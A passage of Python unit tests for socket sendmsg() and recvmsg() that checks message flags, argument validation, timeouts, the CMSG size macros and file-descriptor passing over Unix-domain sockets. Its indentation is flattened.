# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
